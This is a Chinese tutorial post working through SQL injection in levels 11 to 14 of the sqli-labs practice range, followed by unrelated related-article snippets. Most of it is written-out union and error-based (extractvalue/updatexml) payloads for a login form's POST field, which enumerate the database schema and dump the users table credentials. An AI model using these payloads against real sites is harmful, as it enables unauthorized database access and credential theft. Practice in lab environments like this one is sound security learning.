Web安全-SQL注入【sqli靶场第11-14关】(三)

★★实战前置声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

0、总体思路

先确认是否可以SQL注入,使用单双引号,1/0,括号测试 ’ " 1/0 ),页面显示不同内容或响应长度来确定。存在SQL注入后则开始构造轮子进行验证,猜出数据库,用户名,表名,字段名,有没有文件漏洞等。

为方便验证提交拦截到BP,右击到Repeater修改参数值进行验证看响应内容。

特殊字符说明

+表示空格
--表示注释

以下内容验证都是在uname=后面构造进行验证。

在这里插入图片描述

1、Less11

POST - Error Based - Single quotes- String

1.1、判断是否存在SQL注入

正常响应长度

在这里插入图片描述

输入带单引号’,响应长度有变化

在这里插入图片描述

往下拉看到有提示错误信息,可以确定可以SQL注入

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '123' LIMIT 0,1' at line 1

1.2、确定查询字段个数

从界面上看应该是2个,但还是以确定结果为准

# 输入内容
'+order+by+3--+# 关键结果
Unknown column '3' in 'order clause'</br># 修改为2
'+order+by+2--+# 关键结果
Your Login name:admin<br>
Your Password:admin<br>

所以可以确定的是查询字段是2个,刚好又是我输入的是弱口令账户:admin,后面密码匹配条件又被我注释了,账号密码就拿到了,是可以登录成功。接下来看是否可拿到其他数据,比如数据库等。

在这里插入图片描述

1.3、联合查询

通过union语句方式发现没办法拿到其他数据,需要尝试报错函数

# 验证内容1
'+and+1=2+union+select+1,2--+# 输出内容
Your Login name:1<br>
Your Password:2<br># 验证内容2
'+and+1=1+union+select+1,2--+
# 验证内容2
'+and+1=1+union+select+database(),user()--+# 输出内容
Your Login name:admin<br>
Your Password:admin<br>

1.4、报错函数

1.4.1、获取数据库名和账号

报错函数extractvalue,0x7e是~的ASCII码,字符型后面有加单引号,数字型没有,

# 字符型
extractvalue(1,concat(0x7e,(select+user()),0x7e))='1
#数字型
extractvalue(1,concat(0x7e,(select+user()),0x7e))=1

根据报错函数获取到数据库名,登录名

# 输入内容
'and+extractvalue(1,concat(0x7e,(select+database()),0x7e))='1# 输出内容
XPATH syntax error: '~security~'</br># 输入内容
'and+extractvalue(1,concat(0x7e,(select+user()),0x7e))='1# 输出内容
XPATH syntax error: '~root@localhost~'</br>

报错函数updatexml,字符型后面有加单引号,数字型没有,以下的函数结果和上面的内容获取的结果是一样的

# 字符型
(updatexml(1,concat(0x7e,(select+user()),0x7e),1))='1
#数字型
(updatexml(1,concat(0x7e,(select+user()),0x7e),1))=1
1.4.2、获取表名

使用updatexml获取库的表名,0x23是#的ASCII码

# 输入内容
'and+(updatexml(1,concat(0x23,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema='security')),1))='1# 输出内容
XPATH syntax error: '#emails,referers,uagents,users'</br>

从获取到的数据库表名,users应该就是存储数据库登录名的表了。

注意:在靶场实验过程中可获取:数据库=>表=>字段=>数据 ,但在实战过程中,到数据库这个步骤就行,不要去查数据。

1.4.3、获取表对应字段
# 输入内容
'and+(updatexml(1,concat(0x23,(select+group_concat(column_name)+from+information_schema.columns+where+table_schema='security'+and+table_name='users')),1))='1# 输出内容
XPATH syntax error: '#id,username,password'</br>
1.4.4、获取表数据
# 输入内容
'and+(updatexml(1,concat(0x23,(select+group_concat(id,'~',username,'~',password)+from+security.users)),1))='1# 输出内容
XPATH syntax error: '#1~Dumb~Dumb,2~Angelina~I-kill-y'</br>

1.5、验证登录

使用账号/密码:Dumb/Dumb,登录成功

在这里插入图片描述

2、Less12

POST - Error Based - Double quotes- String-with twist

2.1、判断是否存在SQL注入

正常响应长度

在这里插入图片描述

输入带单引号’发现没有变化

在这里插入图片描述

尝试用双引号",响应长度有变化

在这里插入图片描述

往下拉看到有提示错误信息,可以确定可以SQL注入

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '123") LIMIT 0,1' at line 1

2.2、确定查询字段个数

从界面上看应该是2个,但还是以确定结果为准

# 输入内容
"+order+by+3--+# 输出结果
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3-- ") and password=("123") LIMIT 0,1' at line 1</br>

从错误结果来看是少了括号)闭合,因此调整轮子加上括号)验证

# 输入内容
")+order+by+3--+# 输出结果
Unknown column '3' in 'order clause'</br># 修改为2
")+order+by+2--+# 输出结果
Your Login name:admin<br>
Your Password:admin<br>

所以可以确定的是查询字段是2个,刚好又是我输入的是弱口令账户:admin,后面密码匹配条件又被我注释了,账号密码就拿到了,是可以登录成功。接下来看是否可拿到其他数据,比如数据库等。

注意后面的所有内容破解前面部分都是需要")把前面语句闭合。

2.3、联合查询

2.3.1、获取数据库名和账号

通过union语句方式查询数据库,用户名。

# 输入内容
")+and+1=2+union+select+database(),user()--+# 输出结果
Your Login name:security<br>
Your Password:root@localhost<br>
2.3.2、获取表名

上面得到的数据库,进一步获取表名

# 输入内容
")+and+1=2+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema='security'--+# 输出结果
Your Login name:1<br>
Your Password:emails,referers,uagents,users<br>

从获取到的数据库表名,users应该就是存储数据库登录名的表了。

2.3.3、获取表对应字段
# 输入内容
")+and+1=2+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema='security'+and+table_name='users'--+# 输出结果
Your Login name:1<br>
Your Password:id,username,password<br>
2.3.4、获取表数据
# 输入内容
")+and+1=2+union+select+1,group_concat(id,'~',username,'~',password)+from+security.users--+# 输出结果
Your Login name:1<br>
Your Password:1~Dumb~Dumb,2~Angelina~I-kill-you,3~Dummy~p@ssword,4~secure~crappy,5~stupid~stupidity,6~superman~genious,7~batman~mob!le,8~admin~admin,9~admin1~admin1,10~admin2~admin2,11~admin3~admin3,12~dhakkan~dumbo,14~admin4~admin4<br>

账号/密码有点多,随便找一个进行验证。

2.4、验证登录

使用账号/密码:admin3/admin3,登录成功

在这里插入图片描述

3、Less13

POST - Double Injection - Single quotes- String -with twist

3.1、判断是否存在SQL注入

正常响应长度

在这里插入图片描述

输入带单引号’,响应长度有变化

在这里插入图片描述

往下拉看到有提示错误信息,可以确定可以SQL注入

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '123') LIMIT 0,1' at line 1

3.2、确定查询字段个数

从界面上看应该是2个,但还是以确定结果为准

# 输入内容
'+order+by+3--+# 输出结果
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3-- ') and password=('123') LIMIT 0,1' at line 1</br>

从错误结果来看是少了括号)闭合,因此调整轮子加上括号)验证

# 输入内容
')+order+by+3--+# 输出结果
Unknown column '3' in 'order clause'</br># 修改为2
')+order+by+2--+# 输出结果--没有报错内容

所以可以确定的是查询字段是2个

注意后面的所有内容破解前面部分都是需要')把前面语句闭合。

3.3、联合查询

通过union语句方式发现没办法拿到其他数据,需要尝试报错函数

# 输入内容
')+and+1=1+union+select+database(),user()--+

在这里插入图片描述

3.4、报错函数

3.4.1、获取数据库名和账号

根据报错函数获取到数据库名,登录名

# 输入内容
'and+extractvalue(1,concat(0x7e,(select+database()),0x7e))='1# 输出内容
XPATH syntax error: '~security~'</br># 输入内容
'and+extractvalue(1,concat(0x7e,(select+user()),0x7e))='1# 输出内容
XPATH syntax error: '~root@localhost~'</br>
3.4.2、获取表名

使用updatexml获取库的表名,0x23是#的ASCII码,前面部分加上')用来闭合前面的语句,后面=1而不是='1,再加上--+用于注释后面的语句,获取了表名了。

# 输入内容
')and+(updatexml(1,concat(0x23,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema='security')),1))=1--+
# 输出内容
XPATH syntax error: '#emails,referers,uagents,users'</br>

在这里插入图片描述

4、Less14

POST - Double Injection - Single quotes- String -with twist

4.1、判断是否存在SQL注入

正常响应长度

在这里插入图片描述

输入带双引号",响应长度有变化

在这里插入图片描述

往下拉看到有提示错误信息,可以确定可以SQL注入

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '123" LIMIT 0,1' at line 1</br>

4.2、确定查询字段个数

从界面上看应该是2个,但还是以确定结果为准

# 输入内容
"+order+by+3--+# 输出结果
Unknown column '3' in 'order clause'</br># 修改为2
"+order+by+2--+# 输出结果--没有报错内容

所以可以确定的是查询字段是2个。

3.3、联合查询

通过union语句方式发现没办法拿到其他数据,需要尝试报错函数

# 输入内容
"+and+1=1+union+select+database(),user()--+

在这里插入图片描述

4.4、报错函数

4.4.1、获取数据库名和账号

根据报错函数获取到数据库名,登录名

# 输入内容
"and+extractvalue(1,concat(0x7e,(select+database()),0x7e))="1# 输出内容
XPATH syntax error: '~security~'</br># 输入内容
"and+extractvalue(1,concat(0x7e,(select+user()),0x7e))="1# 输出内容
XPATH syntax error: '~root@localhost~'</br>

5、资料获取

sqli-labs靶场环境搭建请参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/266516.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

JAVA使用HTTP代码示例

你好&#xff0c;Java开发者们&#xff01;今天&#xff0c;我要给你们带来一场硬核的盛宴&#xff0c;那就是在Java中使用HTTP协议进行网络通信的代码示例。准备好接受挑战了吗&#xff1f;Lets go&#xff01; 首先&#xff0c;我们需要导入一些必要的库&#xff0c;它们将成…

[java/jdbc]插入数据时获取自增长主键的值

需求 数据库中的unum字段为自增长主键&#xff0c;使用sql语句插入时需要获取主键的值 insert into udata(upwd,utime,upath) values(?,?,?) 插入之后再查找显然效率太慢&#xff0c;其实jdbc提供了getGeneratedKeys()方法来获取主键 代码 PreparedStatement ps conn.p…

孩子还是有一颗网安梦——Bandit通关教程:Level0

&#x1f575;️‍♂️ 专栏《解密游戏-Bandit》 &#x1f310; 游戏官网&#xff1a; Bandit游戏 &#x1f3ae; 游戏简介&#xff1a; Bandit游戏专为网络安全初学者设计&#xff0c;通过一系列级别挑战玩家&#xff0c;从Level0开始&#xff0c;逐步学习基础命令行和安全概念…

Go语言学习路线规划

&#x1f337;&#x1f341; 博主猫头虎&#xff08;&#x1f405;&#x1f43e;&#xff09;带您 Go to New World✨&#x1f341; &#x1f984; 博客首页——&#x1f405;&#x1f43e;猫头虎的博客&#x1f390; &#x1f433; 《面试题大全专栏》 &#x1f995; 文章图文…

【底层服务/编程功底系列】「网络通信体系」带你攻克网络技术之TCP协议的三次握手和四次链接的技术盲区

背景 当一台客户端和一台服务器进行通信时&#xff0c;TCP协议使用三次握手和四次挥手来建立和终止连接。 三次握手的作用 确认双方的发送和接收能力&#xff1a;在三次握手中&#xff0c;客户端和服务器需要交换彼此的序列号和确认号&#xff0c;以确认彼此的发送和接收能力…

安装程序无法自动安装Virtual Machine Communication Interface Sockets(VSock)驱动程序

环境情况&#xff1a; 物理机win10系统 虚拟机windowserver08系统 vmware 16.0的版本 问题触发&#xff1a; 在虚拟机win7系统上安装vmware tools出现提示&#xff0c;报错信息“安装程序无法自动安装Virtual Machine Communication Interface Sockets&#xff08;VSock&a…

一文详解Java语言的条件判断语句

目录 一、什么是Java语言 二、什么是条件判断 三、if语句 四、switch语句 一、什么是Java语言 Java是一种广泛使用的高级编程语言&#xff0c;最初由Sun Microsystems&#xff08;现在是Oracle公司的一部分&#xff09;于1995年发布。它是一种面向对象的语言&#xff0c;具…

2023年阿里云云栖大会-核心PPT资料下载

一、峰会简介 历经14届的云栖大会&#xff0c;是云计算产业的建设者、推动者、见证者。2023云栖大会以“科技、国际、年轻”为基调&#xff0c;以“计算&#xff0c;为了无法计算的价值”为主题&#xff0c;发挥科技平台汇聚作用&#xff0c;与云计算全产业链上下游的先锋代表…

Python3开发环境的搭建

1&#xff0c;电脑操作系统的确认 我的是win10、64位的&#xff0c;你们的操作系统可自寻得。 2&#xff0c;Python安装包的下载 &#xff08;1&#xff09;浏览器种输入网址&#xff1a;https://www.python.org 选择对应的系统&#xff08;我的是win10/64位) &#xf…

LeetCode 279完全平方数 139单词拆分 卡码网 56携带矿石资源(多重背包) | 代码随想录25期训练营day45

动态规划算法6 LeetCode 279 完全平方数 2023.12.11 题目链接代码随想录讲解[链接] int numSquares(int n) {//1确定dp数组&#xff0c;其下标表示j的完全平方数的最少数量//3初始化&#xff0c;将dp[0]初始化为0&#xff0c;用于计算&#xff0c;其他值设为INT_MAX用于递推…

HCIA-H12-811题目解析(9)

1、【单选题】下面选项中&#xff0c;能使一台IP地址为10.0.0.1的主机访问Interne的必要技术是&#xff1f; 2、【单选题】 FTP协议控制平面使用的端口号为&#xff1f; 3、【单选题】 使用FTP进行文件传输时&#xff0c;会建立多少个TCP连接&#xff1f; 4、【单选题】完成…

java.net.SocketException: Connection reset

背景 在我用socket进行TCP通信的时候&#xff0c;当我关闭client端时在服务端出现了Connection reset的异常。 一、问题 下面是异常信息&#xff1a; Exception in thread "Thread-12" java.lang.RuntimeException: java.net.SocketException: Connection reseta…